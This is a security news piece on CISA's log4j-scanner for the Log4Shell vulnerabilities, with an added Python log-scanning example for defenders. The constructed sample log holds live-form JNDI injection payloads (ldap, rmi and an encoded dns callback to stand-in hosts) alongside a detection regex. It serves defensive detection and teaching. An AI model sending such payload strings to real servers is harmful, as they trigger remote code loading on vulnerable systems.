CISA has announced the release of a scanner for identifying web services impacted by the Apache Log4j remote code execution vulnerabilities tracked as CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.
log4j-scanner is a project derived from work by other members of the open-source community, built by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.
This scanning solution builds upon similar tools, including an automated scanning framework for the CVE-2021-44228 bug dubbed Log4Shell. It enables security teams to scan network hosts for Log4j RCE exposure and spot web application firewall (WAF) bypasses that could allow threat actors to gain code execution within the organization's environment.
CISA highlights the following features on log4j-scanner’s project page:
- Support for lists of URLs.
- Fuzzing for more than 60 HTTP request headers (not only the 3-4 headers covered by previously seen tools).
- Fuzzing for HTTP POST Data parameters.
- Fuzzing for JSON data parameters.
- Supports DNS callback for vulnerability discovery and validation.
- WAF Bypass payloads.
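The header-fuzzing feature above has a defender-side counterpart: if a scanner (or an attacker) can place the lookup string in any of 60+ headers, log review must cover every logged field, not just the request line. The following is an added example, not code from CISA's log4j-scanner; it checks each quoted field of an access log for a JNDI lookup string after percent-decoding. The four-quoted-field log layout (request, referer, User-Agent, and an extra X-Api-Version header) and the sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample: combined-log style with an extra quoted X-Api-Version
# field appended. Addresses and hostnames are documentation/test values.
SAMPLE_LOG = r'''
10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"
10.0.0.7 - - [12/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 311 "-" "${jndi:ldap://198.51.100.23:1389/a}" "-"
10.0.0.9 - - [12/Dec/2021:10:02:14 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fhost.callback.example%2Fx%7D HTTP/1.1" 404 90 "-" "curl/7.79" "-"
10.0.0.11 - - [12/Dec/2021:10:03:30 +0000] "POST /api HTTP/1.1" 200 44 "-" "okhttp/4.9" "${jndi:rmi://198.51.100.23/obj}"
'''

# Assumed column order of the quoted fields in the constructed log format.
FIELD_NAMES = {0: "request", 1: "referer", 2: "user-agent", 3: "x-api-version"}

# The basic Log4Shell indicator: a JNDI lookup followed by its scheme (ldap, rmi, dns, ...).
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def decode(s: str) -> str:
    # Decode twice: probes are often double-encoded, and a second pass on
    # already-decoded text leaves it unchanged.
    return unquote(unquote(s))


def find_jndi(line: str) -> list:
    """Return (field_index, scheme) for every quoted field carrying a JNDI lookup."""
    hits = []
    for idx, field in enumerate(re.findall(r'"([^"]*)"', line)):
        m = JNDI_RE.search(decode(field))
        if m:
            hits.append((idx, m.group(1).lower()))
    return hits


def scan_log(text: str) -> list:
    """Scan a whole log; each finding records source IP, the field hit, and the JNDI scheme."""
    findings = []
    for line in text.strip().splitlines():
        if not line.strip():
            continue
        src = line.split()[0]
        for idx, scheme in find_jndi(line):
            findings.append({"src": src, "field": FIELD_NAMES.get(idx, f"field{idx}"), "scheme": scheme})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']}: JNDI lookup via {f['scheme']} in {f['field']}")
```

The URI-only check many teams started with would miss the second and fourth sample lines, where the string sits in the User-Agent and a custom header.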
CISA is also spearheading a push to urgently patch devices vulnerable to Log4Shell attacks, to block threat actors' attempts to exploit Log4Shell-vulnerable systems and infect them with malware.